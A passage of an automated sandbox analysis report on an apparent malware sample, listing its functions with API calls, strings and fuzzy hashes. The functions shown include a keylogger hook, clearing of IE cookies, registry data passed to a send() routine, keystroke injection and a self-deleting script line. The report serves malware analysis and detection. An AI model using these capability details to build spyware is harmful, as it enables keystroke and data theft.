Instruction Fuzzy Hash: 47B12975A016199FEB24DF18C885BAEB7B4FB08304F1085EEE949A7351D774AE90CF48

Uniqueness

Uniqueness Score: -1.00%

Function 00414858 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

tcp, xrefs: 004149C1
udp, xrefs: 00414994

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: ec04a778613b02d88d88d5331b5d3629692560195fe72b535b1e99ed76cf7fff
Instruction ID: 9d76a0c9ad3deaf1f7ecf65dac24a6283800f1d85165e355cec6a2089a408fa6
Opcode Fuzzy Hash: ec04a778613b02d88d88d5331b5d3629692560195fe72b535b1e99ed76cf7fff
Instruction Fuzzy Hash: B47197B0A483428FDB24DE2884806ABB7E0AFD4785F15443FF88587351D778CD858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC3330 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00CC3367
___except_validate_context_record.LIBVCRUNTIME ref: 00CC336F
_ValidateLocalCookies.LIBCMT ref: 00CC33F8
__IsNonwritableInCurrentImage.LIBCMT ref: 00CC3423
_ValidateLocalCookies.LIBCMT ref: 00CC3478

Strings

csm, xrefs: 00CC340D
csm, xrefs: 00CC34A1

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
Opcode ID: 1fd246114f30888354627c6ed3c7f3d1b7607eb676ac5b8d443c826b3e6c89d9
Instruction ID: ce5406160797f03ee20ce6f82a2f5e531afcae38da948a174b94df401bd5c7ef
Opcode Fuzzy Hash: 1fd246114f30888354627c6ed3c7f3d1b7607eb676ac5b8d443c826b3e6c89d9
Instruction Fuzzy Hash: F151A134A002849FCF15DF29E845FAEBBA5AF44314F14C19DE8159B3A2C772DB02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004018BE
ExitThread.KERNEL32 ref: 004018F6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04

Part of subcall function 004346BE: __onexit.LIBCMT ref: 004346C4

Strings

NG, xrefs: 0040190D
XMG, xrefs: 00401902
@kG, xrefs: 00401888
NG, xrefs: 00401990

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: @kG$XMG$NG$NG
API String ID: 1649129571-2828059001
Opcode ID: d11aa6827783ca1f78788ad7a1875fc96f00494b4586a86b26c6c6b9e6b90d2c
Instruction ID: 65e0bbd845b0698e41ba7c367e27804c35fd250e2cfc12280843aa406abfdd31
Opcode Fuzzy Hash: d11aa6827783ca1f78788ad7a1875fc96f00494b4586a86b26c6c6b9e6b90d2c
Instruction Fuzzy Hash: 7E41D5312042009BC324FB26DD96ABE73A6ABD5314F00453FF55AA61F2DF386E49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5

Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3

Strings

.part, xrefs: 00407989

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 6d98fc7951b37758a9c32ffa506aac1bbd0b3830703c2cbc954d984816369e8e
Instruction ID: e874ae31f88d0aa3f072cf1e943b28158a3678564fa17fbb0695c37f8af014c9
Opcode Fuzzy Hash: 6d98fc7951b37758a9c32ffa506aac1bbd0b3830703c2cbc954d984816369e8e
Instruction Fuzzy Hash: 80318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
SetWindowsHookExA.USER32 ref: 0040A2E1
GetLastError.KERNEL32 ref: 0040A2ED

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

GetMessageA.USER32 ref: 0040A33B
TranslateMessage.USER32(?), ref: 0040A34A
DispatchMessageA.USER32 ref: 0040A355

Strings

Keylogger initialization failure: error , xrefs: 0040A301

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 3df408a81acfbebc480de00894adf9834a2d8d6a6c4bdcba1a831ec92b492a0d
Instruction ID: c0c8f532641fd7815ca2cfbe9b0d0a2c8afefb59d963ff424aa3b2ebad638a5d
Opcode Fuzzy Hash: 3df408a81acfbebc480de00894adf9834a2d8d6a6c4bdcba1a831ec92b492a0d
Instruction Fuzzy Hash: F1118F32514301ABCB107B769C0986B76ECEA95716B10457EFC85D21D1EA78C910CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0044AB09 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DC4F,?,?,?,0044AD5A,00000001,00000001,?), ref: 0044AB63
__alloca_probe_16.LIBCMT ref: 0044AB9B
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DC4F,?,?,?,0044AD5A,00000001,00000001,?), ref: 0044ABE9
__alloca_probe_16.LIBCMT ref: 0044AC80
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044ACE3
__freea.LIBCMT ref: 0044ACF0

Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

__freea.LIBCMT ref: 0044ACF9
__freea.LIBCMT ref: 0044AD1E

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cb162bc582dd0838a499862c59a6069a460d6333bb2ae7e35171617e21240b7e
Instruction ID: af0dc4fbe63ecb207d56a2a0cf6a6b4459746298ae4a4ccc7a56e973e124d7e9
Opcode Fuzzy Hash: cb162bc582dd0838a499862c59a6069a460d6333bb2ae7e35171617e21240b7e
Instruction Fuzzy Hash: 69512B72640206AFFB254F64CC81EBF77AAEB44750F15422EFD05D6280EB38DC50C699

Uniqueness

Uniqueness Score: -1.00%

Function 00CCCA0C Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00CCCA36
_free.LIBCMT ref: 00CCCB0F
_free.LIBCMT ref: 00CCCB3C

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: defca25013d2774486d33791db9c9e849cb2380b51e469b3df3a2ff11078fca2
Instruction ID: eda9318d4e0493f0af14033eb7310e0f0bdfa2bed600b80f902073e0927fec86
Opcode Fuzzy Hash: defca25013d2774486d33791db9c9e849cb2380b51e469b3df3a2ff11078fca2
Instruction Fuzzy Hash: A4515871904209AFDB20AFB5D8C2F6E7BB8EF05310F14456EE52D97182EB358A41EB51

Uniqueness

Uniqueness Score: -1.00%

Function 004198E1 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 0041991A
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041993B
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041995B
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041996F
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419985
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199A2
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199BD
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 004199D9

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction ID: dbafcd600a556151d3eaef7b7a040db0989071afdf7399d2c68b8699c8e8566f
Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction Fuzzy Hash: 4E319471554309AEE311CF51DD41BEBBBDCEF98B54F00080FF68086291D2A699C98B97

Uniqueness

Uniqueness Score: -1.00%

Function 00449050 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004490D2
_free.LIBCMT ref: 004490F6
_free.LIBCMT ref: 0044927D
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 0044928F
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449307
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449334
_free.LIBCMT ref: 00449449

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 47af7cbdf339c46287ceda7e7771956b815a7df14b66580b248b3cff71a48e97
Instruction ID: 8213b5658e312fa0c8719fd21ead51c50bd85158425f8b852127bd6d3b2d9e40
Opcode Fuzzy Hash: 47af7cbdf339c46287ceda7e7771956b815a7df14b66580b248b3cff71a48e97
Instruction Fuzzy Hash: 6DC14971900205ABFB249F798D85AAFBBB8EF46314F1441AFE88497391E7388D41E75C

Uniqueness

Uniqueness Score: -1.00%

Function 00444C3B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

_free.LIBCMT ref: 00444D46
_free.LIBCMT ref: 00444D5D
_free.LIBCMT ref: 00444D7C
_free.LIBCMT ref: 00444D97
_free.LIBCMT ref: 00444DAE

Strings

DD, xrefs: 00444C6B, 00444DED

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: DD
API String ID: 3033488037-393368396
Opcode ID: 894deed27b140645b0a3b5a50c7487509b24122a7b298760850c43448a9a27f9
Instruction ID: 794643540ba05b1832729bfd17deba34f9ae2695eded42236b1100d7bffd7706
Opcode Fuzzy Hash: 894deed27b140645b0a3b5a50c7487509b24122a7b298760850c43448a9a27f9
Instruction Fuzzy Hash: 1F51F571A00704AFEB20DF69C881B6A77F4EF89714F15456FE809D7251E739E901CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004139A3 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413A0A
RegEnumKeyExW.ADVAPI32 ref: 00413A39
RegEnumValueW.ADVAPI32 ref: 00413AD9

Strings

[regsplt], xrefs: 00413B65
xUG, xrefs: 00413B94
TG, xrefs: 00413B4B

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$xUG$TG
API String ID: 3554306468-1165877943
Opcode ID: 64c4bec149cd04c75b22b0529d879bbeb51e457b34214b05c4e78b77d15b4099
Instruction ID: e89ae2fc3e2f172f62eacf7d7454cf1e822e63a892199c4ebc4bb166adb4cb0d
Opcode Fuzzy Hash: 64c4bec149cd04c75b22b0529d879bbeb51e457b34214b05c4e78b77d15b4099
Instruction Fuzzy Hash: F4513C71900219AADB11EBA5DC85EEFB77DAF04309F10407BF505B2191EF786B48CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044B27C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044B9F1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B2BE
__fassign.LIBCMT ref: 0044B339
__fassign.LIBCMT ref: 0044B354
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B37A
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044B9F1,00000000,?,?,?,?,?,?,?,?,?,0044B9F1,?), ref: 0044B399
WriteFile.KERNEL32(?,?,00000001,0044B9F1,00000000,?,?,?,?,?,?,?,?,?,0044B9F1,?), ref: 0044B3D2

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 7f14d60be4bedc768f9c1ecc07add3f37f6dbe09138a2e94954e294804714371
Instruction ID: 531f87820f5ca7332e2a576686b516ff1612a06bf14289906b3cf5c82a3cface
Opcode Fuzzy Hash: 7f14d60be4bedc768f9c1ecc07add3f37f6dbe09138a2e94954e294804714371
Instruction Fuzzy Hash: 43518170900249AFDB10CFA8DC85AEEBBF4EB09301F14456AE955E7392D734D941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413C5B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413C94

Part of subcall function 004139A3: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413A0A
Part of subcall function 004139A3: RegEnumKeyExW.ADVAPI32 ref: 00413A39

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413E02

Strings

NG, xrefs: 00413CB7
TG, xrefs: 00413DE8
xUG, xrefs: 00413DF4
NG, xrefs: 00413D71

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: xUG$NG$NG$TG
API String ID: 3114080316-2811732169
Opcode ID: 282d588d3909188580504e8da4b0556a988349574dae4fe2356a4b277d5de985
Instruction ID: 7dadb05ed7d6a3791a19dcb9bd021d6cac3048b7f1650f13bd058f0b8db42a8b
Opcode Fuzzy Hash: 282d588d3909188580504e8da4b0556a988349574dae4fe2356a4b277d5de985
Instruction Fuzzy Hash: C5418D316082405BC324F726DC56AEF72959BD1348F40883FF54A671D2EF7C5D4A8AAE

Uniqueness

Uniqueness Score: -1.00%

Function 0041B5D8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00413569: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041358B
Part of subcall function 00413569: RegQueryValueExW.ADVAPI32(?,0040F261,00000000,00000000,?,00000400), ref: 004135AA
Part of subcall function 00413569: RegCloseKey.ADVAPI32(?), ref: 004135B3

Part of subcall function 0041BF05: GetCurrentProcess.KERNEL32(?,?,?,0040D9F8,WinDir,00000000,00000000), ref: 0041BF16

_wcslen.LIBCMT ref: 0041B6B1

Strings

program files (x86)\, xrefs: 0041B6AB
http\shell\open\command, xrefs: 0041B5E8
8SG, xrefs: 0041B657, 0041B65C
program files\, xrefs: 0041B697, 0041B69E, 0041B6B0
.exe, xrefs: 0041B603

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
API String ID: 37874593-122982132
Opcode ID: 02f4fff6ae0b27771b2aa90b56d6015931d8b5e32b8987f4592f74a2b3824b19
Instruction ID: c6fac897f3708705da20762e946dcced6dc574eea8f21ad10bd7ff4b63ea14c8
Opcode Fuzzy Hash: 02f4fff6ae0b27771b2aa90b56d6015931d8b5e32b8987f4592f74a2b3824b19
Instruction Fuzzy Hash: 65219272A002082BDB04BAB59C96AFE766D9B49328F10043FF405B72D2FE7C9D48426D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE37 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004134F4: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413518
Part of subcall function 004134F4: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413535
Part of subcall function 004134F4: RegCloseKey.KERNEL32(?), ref: 00413540

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BEB9
PathFileExistsA.SHLWAPI(?), ref: 0040BEC6

Strings

Cookies, xrefs: 0040BE4B
[IE cookies not found], xrefs: 0040BE8E
[IE cookies cleared!], xrefs: 0040BF13, 0040BF38
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040BE50

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 35a2d3cb8f5d9bcb4f7ab1b2fd4fdddb9bec042da46c26696ec865b042f9e252
Instruction ID: 801003b70fd9dbf496093a5a5275d638bd41a560824cd0b42c2c86a2de3f06d8
Opcode Fuzzy Hash: 35a2d3cb8f5d9bcb4f7ab1b2fd4fdddb9bec042da46c26696ec865b042f9e252
Instruction Fuzzy Hash: CA214D71A40219A6CB04F7A5CC569EE77699F10704F40017FE602B72D2EB786A498ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00456A93 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0721176012265fd08e84481192ff7188ea35d222f9f787e154cda1801c2bc97d
Instruction ID: e67e80b8f015ee546dd56432ce4a8dadb94fcda799c7d0fc2e4964d2423921da
Opcode Fuzzy Hash: 0721176012265fd08e84481192ff7188ea35d222f9f787e154cda1801c2bc97d
Instruction Fuzzy Hash: C711E771504224BBDB206F768C04D6B7A6CEB85376B12452BFD11D7252DE39CC01C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00CC94FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 00CC9567
api-ms-, xrefs: 00CC9553

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: e12b918d41bab609469a3115c0590793d90d94ea28ab80aeb452c0065a4a777a
Instruction ID: 1f65caee0070b877db2fb54462239390b0138990937a6a58556f8fabfa8ffa9b
Opcode Fuzzy Hash: e12b918d41bab609469a3115c0590793d90d94ea28ab80aeb452c0065a4a777a
Instruction Fuzzy Hash: 8021D571A02220EBDB235B25CC48F6E7758DF457A0F250369ED22A72D0DA30EE0197E5

Uniqueness

Uniqueness Score: -1.00%

Function 0041C33F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D347,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C37E
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C39B
CloseHandle.KERNEL32(00000000), ref: 0041C3A7
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C3B8
CloseHandle.KERNEL32(00000000), ref: 0041C3C5

Strings

hpF, xrefs: 0041C340

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID: hpF
API String ID: 1852769593-151379673
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 157d56447e2bc733fdf4ad62f20ed10b0773735c38ec4f108ef208bf9d1535e6
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: 6E11E571284319FFE7144A249CC8EFB739CEB4A365F10862BF962C22D1C625CC81963D

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD370 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CCD338: _free.LIBCMT ref: 00CCD35D

_free.LIBCMT ref: 00CCD3BE

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CC7A83), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(?,?,00CC7A83), ref: 00CC8979

_free.LIBCMT ref: 00CCD3C9
_free.LIBCMT ref: 00CCD3D4
_free.LIBCMT ref: 00CCD428
_free.LIBCMT ref: 00CCD433
_free.LIBCMT ref: 00CCD43E
_free.LIBCMT ref: 00CCD449

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 89e8bd580dadc0ca0831b6cc32d56457bf2851fca634395e219d98d1c19114df
Instruction ID: cbde20585bd5b06534af7157450b9e4fdfbd109f8aa369ef0c9eb7937643c0f8
Opcode Fuzzy Hash: 89e8bd580dadc0ca0831b6cc32d56457bf2851fca634395e219d98d1c19114df
Instruction Fuzzy Hash: F1115171540B88AADA20B7B0CD47FDBB7BC9F00700F444D2DF69A6A0A2DA75F506A752

Uniqueness

Uniqueness Score: -1.00%

Function 00450E3B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00450B82: _free.LIBCMT ref: 00450BAB

